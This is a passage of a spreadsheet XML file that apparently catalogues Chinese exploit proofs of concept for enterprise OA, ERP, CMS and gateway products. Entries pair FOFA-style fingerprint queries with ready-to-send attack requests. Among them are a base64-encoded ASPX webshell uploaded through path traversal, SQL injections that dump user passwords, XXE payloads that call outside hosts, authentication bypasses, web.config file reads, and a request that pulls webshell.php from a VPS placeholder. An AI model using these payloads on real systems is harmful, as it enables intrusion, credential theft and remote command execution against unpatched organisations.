    matches: (code.eq("200") &amp;&amp; body.contains("CC03E747A6AFBBCBF8BE7668ACFEBEE5"))
exp:
  relative: req0 &amp;&amp; req1
  session: false
  requests:
  - method: POST
    timeout: 10
    path: /MobileService/Web/Handler/hdlUploadFile.ashx?puser=../../../Style/abcd
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
        Gecko) Chrome/94.0.2558.72 Safari/537.36
    follow_redirects: true
    matches: code.eq("200")
    files:
      Filedata:
      - nihao.aspx
      - data:text/plain;base64,PCVAIFBhZ2UgTGFuZ3VhZ2U9IkpzY3JpcHQiIHZhbGlkYXRlUmVxdWVzdD0iZmFsc2UiICU+CjwlCnZhciBjPW5ldyBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbygiY21kIik7CnZhciBlPW5ldyBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcygpOwp2YXIgb3V0OlN5c3RlbS5JTy5TdHJlYW1SZWFkZXIsRUk6U3lzdGVtLklPLlN0cmVhbVJlYWRlcjsKYy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7CmMuUmVkaXJlY3RTdGFuZGFyZE91dHB1dD10cnVlOwpjLlJlZGlyZWN0U3RhbmRhcmRFcnJvcj10cnVlOwplLlN0YXJ0SW5mbz1jOwpjLkFyZ3VtZW50cz0iL2MgIiArIFJlcXVlc3QuSXRlbVsiY21kIl07CmUuU3RhcnQoKTsKb3V0PWUuU3RhbmRhcmRPdXRwdXQ7CkVJPWUuU3RhbmRhcmRFcnJvcjsKZS5DbG9zZSgpOwpSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkgKyBFSS5SZWFkVG9FbmQoKSk7ClN5c3RlbS5JTy5GaWxlLkRlbGV0ZShSZXF1ZXN0LlBoeXNpY2FsUGF0aCk7ClJlc3BvbnNlLkVuZCgpOyU+
      - text/plain
  - method: GET
    timeout: 10
    path: /Style/abcd.aspx?cmd={{command}}
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
        Gecko) Chrome/94.0.2558.72 Safari/537.36
    follow_redirects: true
    matches: code.eq("200")
    result: '{{body}}'</t>
  </si>
  <si>
    <t>东北师大理想软件股份有限公司智慧教育云平台存在任意用户登录漏洞</t>
  </si>
  <si>
    <t>GET /Account/LoginUserPersonType?userId=1 HTTP/1.1 
Host: 
Connection: keep-alive 
sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"sec-ch-ua-mobile: ?0 
sec-ch-ua-platform: "Windows" 
Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/125.0.0.0 Safari/537.36
header 包含 Set-Cookie 且 body 包含 success:true，刷新页面或允许重定向</t>
  </si>
  <si>
    <t>易捷OA ShowPic存在任意文件读取漏洞</t>
  </si>
  <si>
    <t>数字通/mobile/document/updateparase存在sql注入漏洞</t>
  </si>
  <si>
    <t>response=”/assets/8cca19ff/css/bootstrap-yii.css”</t>
  </si>
  <si>
    <t>赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞</t>
  </si>
  <si>
    <t>GET /AuthToken/Index?loginName=System&amp;token=c94ad0c0aee8b1f23b138484f014131f HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Accept-Encoding: gzip</t>
  </si>
  <si>
    <t>Bladex notice/list 存在sql注入漏洞</t>
  </si>
  <si>
    <t>GET /api/blade-desk/notice/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1
Host: 
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
Connection: close</t>
  </si>
  <si>
    <t>泛微云桥addResume存在任意文件上传漏洞</t>
  </si>
  <si>
    <t>POST /wxclient/app/recruit/resume/addResume?fileElementld=H HTTP/1.1
Host: 
Pragma: no-cache
Cache-Control: no-cache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br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary83Hl3B723UfEAUV0
Content-Length: 279
------WebKitFormBoundary83Hl3B723UfEAUV0
Content-Disposition: form-data; name="file";filename="1234.jsp"
123123
------WebKitFormBoundary83Hl3B723UfEAUV0
Content-Disposition: form-data; name="file";filename="1234.jsp"
123123
------WebKitFormBoundary83Hl3B723UfEAUV0--
/upload/202408/C/1234.js%70
url链接C处根据环境不同而变化。
1、有的环境是1个大写字母
2、有的环境是2个大写字母</t>
  </si>
  <si>
    <t>赛蓝企业管理系统 GetCssFile存在任意文件读取漏洞</t>
  </si>
  <si>
    <t>GET /Utility/GetCssFile?filePath=../web.config HTTP/1.1 
Host: {{Hostname}} 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik 
e Gecko) Chrome/75.0.3770.100 Safari/537.36</t>
  </si>
  <si>
    <t>泛微E-Cology deleteRequestInfoByXml 存在XXE漏洞</t>
  </si>
  <si>
    <t xml:space="preserve">POST /rest/ofs/deleteRequestInfoByXml HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/xml
Content-Length: 131
&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;!DOCTYPE syscode SYSTEM "http://zuwyyvjnql.yutu.eu.org"&gt;
&lt;M&gt;&lt;syscode&gt;&amp;send;&lt;/syscode&gt;&lt;/M&gt;
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/xml
Content-Length: 131
&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;!DOCTYPE syscode SYSTEM "http://tzcnxwantm.dgrh3.cn"&gt;
&lt;M&gt;&lt;syscode&gt;&amp;send;&lt;/syscode&gt;&lt;/M&gt;
</t>
  </si>
  <si>
    <t>联软UniSDP零信任访问控制系统 jwt token泄露</t>
  </si>
  <si>
    <t>同望OA存在密码重置漏洞</t>
  </si>
  <si>
    <t>H3C iMC智能管理中心 远程代码执行漏洞</t>
  </si>
  <si>
    <t>"/imc/javax.faces.resource/images/login_logo_h3c.png.jsf?ln=primefaces-imc-new-webui"
body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui"
body="iMC来宾接入自助管理系统"</t>
  </si>
  <si>
    <t>POST /byod/index.xhtml HTTP/1.1 
Host: {{Hostname}} 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/127.0.0.0 Safari/537.36 
Content-Type: application/x-www-form-urlencoded 
Via: whoami 
javax.faces.ViewState=8SzWaaoxnkq9php028NtXbT98DEcA...Uh57HB/L8xz6eq%2b4sy0rUOuO 
dM5ccd2J6LPx8c6%2b53QkrX...jpFKgVnp07bad4n6CCBW8l98QIKwByAhLYdU2VpB/voaa....2 
oU%2burahQDFE8mIaFvmwyKOHiwyovIHCVymqKwNdWXm3iHLhYEQXL4....k3z7MWm%2 
bwbV2Dc9TXV4rs8E6M7ZvVM3B0pORK8vAhd2iLBkgFhGHw9ZgOwifGnyMzfxlU....gG4chE 
Og57teuLurMPrulbEVBAEl7rRwobqvxb91sG%2bGMrGWFL5%2bwFvE56x7UEzHtE/o0IRtzTKi 
/EFnamrPT1046e7L8jABKDB/LjCX2qAOmqQkIz4gXrEFnHHYZ9LZc7t9ZZPNT...JZjummuZuro 
r/zwPbnsApwXlYsn2hDAZ7QlOBunA3t7omeOTI5keWXvmOH8eoEEN//SlmQblwhBZ7kSHPvSt 
q0ZciiPptEzVjQ/k/gU2QbCSc7yG0MFbhcJEDQj4yKyJ/yTnOOma....KuNzZl%2bPpEua%2b28h2 
YCKipVb5S/wOCrg%2bKD3DUFCbdWHQRqDaZyvYsc8C0X7fzutiVUlSB7OdGoCjub9WuW0d 
2eeDWZmOt3Wunms3SwAbE7R%2bonCRVS8tiYWF8qiQS%2bl0k8Gw/Hz6Njpfe0upLIAtPFND 
uSf69qGg4isEmY2FtoSQTdD8vU0BdJatHrBArPgo9Qsp0jSJBlUz2OqteQg05PYO6gEBXVj/RiTB 
HI1/pOzlcE0wVZcLUHnxGNvckSCTiT....nWbkWGJ8AYCvrM0PHZ/BYcKKRf3rMHoIqcAN%2 
bORMhXcmAXRcvq29c5xqoOuvrMSJPDZmbZhcm/99crGJSO5HxXQder9WKm2tVBaDLEC9ul 
pWyICJYgfxayoWkt6vwPcq2Tn20vn5RDpfqJKLNLbrV8g7JDRUUyW%2b....R6PRNunKhfJHvH 
cXAZ73mkCUf7cMUbNhqCbLSGP/D%2bqpqWXk5ZWjsT4tQ9tFH9uvPIaNB7FlcFXI2I2A9oPo 
Y0ltif%2bb8BdPXVfpuZq8boHE4hY%2b33BIl%2bIa%2bov6nyMmGIzCKYeRbfDJtk/45EXvink 
6BIgA/205la6vvqKTGQ32o1AtepBgKei....604cVvbEP7UKor09Gz61mryE4D%2biXG1prZGCT3L 
EtdASuCkmf4RTEc5wks2In3ElZSZl8zf3RsHA0dgbvrpnXe2wLPI%2bUCAGO%2biOG9/%2bbC 
QJQNFmykkyRbmslfcilUxZ%2bIg%2bQuOs9FlMod2ICrkktOFFeZWNeznx737S8H4Nf2%2bp2Q 
NHY2I6GFGtWpqjeZ%2bGmb1euM5Tzi06eJ.......koPrjkDT9VPoxCgpRMQl06x7NShkos7BCI9f 
V1%2b17t5gWZvqAYzeQUsZLaiBXaZfuUtPuBmbq1re/dB/VgSOn4QX%2b8AwwDjtfazsHw4aId 
h4e2a1y/Ou2ZiI//EzkwIBksY6CluuPgocdvtOfNiWcXsfYs3UKLmL/48A4Ls0OF1TrQK4UnfCYt... 
..1DGrwzfXnM9vLHznFaJenqvLY3yTiKN5SSVxvGwvhmp6PFW4Jj7G8NXdr/zN7HyC9Eg1Y1j 
KP7uiO%2bGM2U/etvMOCKwnfP2MnbznP378fZHf1H9yiVVrn%2bm%2b0u8PV.....2MsOTgS6 
B7C8ItflgSfJz5dkJ8IssRAcY%2bu/2QjrW95BBMSRPu2EaCUm1IpuszXEwHYgDizWPzDB0hSR 
gCEjncpGhPX3i10bK4/snBaBcAxAa1e2er2LDe/4WgaIwc9w2wKn3wXY5B87BKF5/Xq30....NNf 
6EMRrQ9154rEkCJb4IU4sFsTuyYlfZatlV%2bC2HM7u7FEbdVvr6yYK4oQqvfPmF5yRplwAYU 
QAvr1jwLbGYxhGaTy14UUrtvoyph5Sqebk2YTKjKX4U7xX5ha4YbyoVIMSRzdvB6YXDY3BId 
%2bgmMWZtTf2UE%2b9UAx/7g30pQNXA....FP1adq6ySd4x3dGVCe4YJcYe2gKWYVcWj5XP 
wUSt2fxdshzgFnjjqmRgxowH2u2nZU0xG539lnxIOlB</t>
  </si>
  <si>
    <t>蓝凌 EKP dataxml.tmpl存在代码执行漏洞</t>
  </si>
  <si>
    <t>POST /ekp/data/sys-common/dataxml.tmpl  HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0)  Gecko/20100101 Firefox/92.0
Accept:  text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language:  zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
s_bean=ruleFormulaValidate&amp;script=try {
String cmd = "ping {{interactsh-url}}";
Process child = Runtime.getRuntime().exec(cmd);
} catch (IOException e) {
System.err.println(e);
}</t>
  </si>
  <si>
    <t>驰聘BPM前台任意文件上传漏洞</t>
  </si>
  <si>
    <t>亿赛通电子文档安全管理系统 UsersService存在序列化漏洞</t>
  </si>
  <si>
    <t>云时空社会化商业ERP系统 online 接口存在身份认证绕过漏洞</t>
  </si>
  <si>
    <t>app="云时空社会化商业ERP系统"</t>
  </si>
  <si>
    <t>GET /sys/user/online HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
响应包获取sessionid值
替换emscm.session.id，刷新页面即可登录后台</t>
  </si>
  <si>
    <t>亿赛通电子文档安全管理系统 CDGAuthoriseTempletService1 存在SQL 注入漏洞</t>
  </si>
  <si>
    <t>body="CDGServer3" || title="电子文档安全管理系统" || cert="esafenet" || body="/help/getEditionInfo.jsp"</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>需要加密工具：</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="10"/>
        <color rgb="FF175CEB"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>https://github.com/wafinfo/DecryptTools</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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> standalone="no"?&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;GetCDGAuthoriseTemplet&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;userId&gt;SystemAdmin&lt;/userId&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;secretLevelId&gt;1112233')</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> union</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> select</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> USER_ID,USER_NAME,PWD,SURNAME,'','','','','','','',''</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 
from</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> WF_USER;#&lt;/secretLevelId&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/GetCDGAuthoriseTemplet&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
以上paylaod需要使用加密工具加密，加密后完整paylaod包：</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /CDGServer3/CDGAuthoriseTempletService1</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Cache-Control:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> max-age=0</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Sec-Ch-Ua:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> "Not:A-Brand";v="99",</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> "Chromium";v="112"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Sec-Ch-Ua-Mobile:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> ?0</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Sec-Ch-Ua-Platform:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> "Windows"</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Chrome/112.0.5615.138</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> Safari/537.36</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Accept:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
/*;q=0.8,application/signed-exchange;v=b3;q=0.7</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Sec-Fetch-Site:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> none</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Sec-Fetch-Mode:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> navigate</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Sec-Fetch-User:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> ?1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Sec-Fetch-Dest:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> document</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Content-Type:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> application/xml</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Content-Length:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 510</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
CGKFAICMPFGICCPHKFGGGBOMICMOKOBGPCBLKPCAHAGPFJHFABCPPKIOHIAIBJLLHJCODJMA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
GKBGIKDAFJHJMMKBDHABAJPBFNLBOIDFBHMMFKFHLPIAOPHEOAICJEMBCKFEIPGINHHBEGD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
OMEOPDKJGPNIJEDNOMEKLJHCGOJCEIPFPEDGBEHJLMNEEFIKFPGCCKCFCCOMONKACOEENLF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
IBAGNJBLHDNBBCNKNLDJINDOCEBFIKAEMNHAPLPHONFGFGIKIAODPKKLMDBNPGPHLNICFP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
MAIMFCOAAFINGBKHCKEAOMKBBALOEGJNGOJBLOJIGKKMKPIDMLCGOFIPFLMODDPOOJNJO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
GHNNMOJGPKBNDEBEIBACIDFMBIJCJDMGLFGCHAHGBIJONAGEOCIKHKHFCEPHONEMCMOJE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
ALFDEKHHIGBCGPKAMKKFNOMJEEINOPOKLEGFLEBIIGAFCDAMAMBFDJPIKCGDFIFMGAFMGFF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
CECFMFDGJFGFIGICP</t>
    </r>
  </si>
  <si>
    <t>Bladex code/list 存在sql注入漏洞</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>body="</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="10"/>
        <color rgb="FF175CEB"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>https://bladex.vip/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>"</t>
    </r>
  </si>
  <si>
    <t>GET /api/blade-develop/code/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1
Host: 
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: bearer eyJhbGciOiJIUzI1Ni</t>
  </si>
  <si>
    <t>龙腾CMS存在文件下载漏洞致远程命令执行</t>
  </si>
  <si>
    <t xml:space="preserve"> icon_hash=“-803002403”</t>
  </si>
  <si>
    <t xml:space="preserve">GET /api/file/multiDownload?file=http://vpsip:8888/webshell.php&amp;savePath=d.php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</si>
  <si>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致远OA前台任意文件读取</t>
  </si>
  <si>
    <t>Supermap iServer 存在文件读取漏洞</t>
  </si>
  <si>
    <t>Apache Solr前台RCE</t>
  </si>
  <si>
    <t>万户OA-graph_include-SQL注入漏洞</t>
  </si>
  <si>
    <t>app="万户ezOFFICE协同管理平台"</t>
  </si>
  <si>
    <t>GET /defaultroot/platform/report/graphreport/graph_include.jsp?id=2&amp;startDate=2022-01-01%2000:00:00.000%27%20as%20datetime)%20group%20by%20t.emp_id,t.empname%20)%20%20s%20group%20by%20empname%20order%20by%20num%20desc%20%20WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Connection: close</t>
  </si>
  <si>
    <t>驰骋低代码开发平台 RunSQL_Init 存在SQL注入</t>
  </si>
  <si>
    <t>icon_hash="-1564380241" || body="正在登录流程&amp;表单引擎设计器,请稍候"</t>
  </si>
  <si>
    <t>POST /WF/Comm/Handler.ashx?DoType=RunSQL_Init HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----123128312312389898yd98ays98d
------123128312312389898yd98ays98d
Content-Disposition: form-data; name="SQL"
SELECT No,Pass FROM Port_Emp
------123128312312389898yd98ays98d--</t>
  </si>
  <si>
    <t>泛微E-Cology系统接口ReceiveCCRequestByXml XXE</t>
  </si>
  <si>
    <t>POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host:{{Hostname}}
User-Agent:Mozilla/5.0(WindowsNT10.0;WOW64)AppleWebKit/537.36(KHTML, likeGecko)Chrome/71.0.3578.98Safari/537.36
Content-Type:application/xml
&lt;?xmlversion="1.0"encoding="utf-8"?&gt;
&lt;!DOCTYPEsyscodeSYSTEM"http://xxx.xxxx.com"&gt;
&lt;M&gt;&lt;syscode&gt;&amp;send;&lt;/syscode&gt;&lt;/M&gt;</t>
  </si>
  <si>
    <t>AspCMS系统commentList.asp SQL注入</t>
  </si>
  <si>
    <t>app="ASPCMS"</t>
  </si>
  <si>
    <t>GET /plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user</t>
  </si>
  <si>
    <t>泛微 e-office 10 schema_mysql.sql敏感信息泄露</t>
  </si>
  <si>
    <t>app="泛微-EOffice" || body="eoffice_loading_tip" &amp;&amp; body="eoffice10"</t>
  </si>
  <si>
    <t>GET /eoffice10/empty_scene/db/schema_mysql.sql HTTP/1.1
Host: 
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 70</t>
  </si>
  <si>
    <t>网神 SecGate3600 安全网关未授权添加用户</t>
  </si>
  <si>
    <t>body="sec_gate_image/login_02.gif"
fid="ldb0WVBlAgZloMw9AAge0A=="</t>
  </si>
  <si>
    <t>POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
Host:
